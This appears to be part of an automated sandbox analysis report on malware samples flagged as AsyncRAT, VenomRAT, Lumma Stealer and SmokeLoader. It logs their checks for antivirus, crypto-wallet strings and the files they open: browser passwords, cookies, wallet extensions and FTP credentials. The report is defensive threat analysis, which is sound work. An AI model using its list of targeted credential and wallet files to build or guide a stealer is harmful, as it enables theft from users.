Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ExtractedLumma\data.bin VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ExtractedLumma\data.bin VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ExtractedVenom\data.bin VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ExtractedVenom\data.bin VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8E87EE GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 19_2_6C8E87EE
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Yara detected AsyncRAT
Source: Yara match File source: 19.2.vm.exe.4e40000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.vm.exe.4e40000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.vm.exe.4e30000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.vm.exe.4e30000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000002.4121890771.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.3209596948.0000000004E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Yara detected VenomRAT
Source: Yara match File source: Process Memory Space: vm.exe PID: 2484, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: vm.exe PID: 2004, type: MEMORYSTR
AV process strings found (often used to terminate AV products)
Source: vm.exe, 00000013.00000002.4121890771.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, vm.exe, 0000001A.00000002.3209596948.0000000004E30000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: MSASCui.exe
Source: lm.exe, 00000014.00000003.2839163970.000000000054E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %\Windows Defender\MsMpeng.exe
Source: vm.exe, 00000013.00000002.4121890771.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, vm.exe, 0000001A.00000002.3209596948.0000000004E30000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: procexp.exe
Source: lm.exe, 00000014.00000003.2840894062.0000000003119000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2884414259.000000000311A000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2851808320.0000000003117000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2836416344.0000000003117000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: vm.exe, 00000013.00000002.4121890771.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, vm.exe, 0000001A.00000002.3209596948.0000000004E30000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: MsMpEng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected Go Injector
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 9.2.EF14.exe.7ff71bc40000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.EF14.exe.7ff71bc40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.2570610433.00007FF71C180000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.2414575122.00007FF71C180000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: EF14.exe PID: 3868, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\EF14.exe, type: DROPPED
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: BitLockerToGo.exe PID: 1988, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: lm.exe PID: 5724, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected SmokeLoader
Source: Yara match File source: 00000003.00000002.1941543133.00000000001D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1941477566.00000000001A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1718024777.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1717820306.00000000001E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Found many strings related to Crypto-Wallets (likely being stolen)
Source: BitLockerToGo.exe, 00000010.00000003.2639948784.0000000003377000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "%appdata%\\Electrum\\wallets","m":["*"]$sJ
Source: BitLockerToGo.exe, 00000010.00000003.2639948784.0000000003377000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "*"],"z":"Wallets/ElectronCash","d":0,"f
Source: EF14.exe String found in binary or memory: 61azMCvCJTGgpqseAkDulivzcEIzbUh6GMdTZAHnf1fdOpeVIX1cvVM4A8eZYfeoEwKiaYuvGzYIFP83bjKF7m6bj2wJAxxEhOliTXiwSEw/wKfyExx0wSCYqAXlH96eBExAmJxHEi07ZRDCnO0inYh1kTLelXIq6GhRN/GAUttG+NG6k9KosqFAP0KhGV9rw2I72LM/52rDcmE4tf+MyZ2GCqyJk4LOJJPPBz+M/3bNhSXwcNXMQCxo38kKghYrUGlK
Source: BitLockerToGo.exe, 00000010.00000003.2639948784.0000000003377000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: BitLockerToGo.exe, 00000010.00000003.2639948784.0000000003385000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: BitLockerToGo.exe, 00000010.00000003.2639948784.000000000335E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ExodusWeb3
Source: BitLockerToGo.exe, 00000010.00000003.2639948784.0000000003377000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Ethereum
Source: BitLockerToGo.exe, 00000010.00000003.2639948784.000000000335E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: 2D42.exe, 0000000A.00000002.2847339987.00007FFD9BD10000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: sqlcolumnencryptionkeystoreprovider
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Tries to harvest and steal ftp login credentials
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
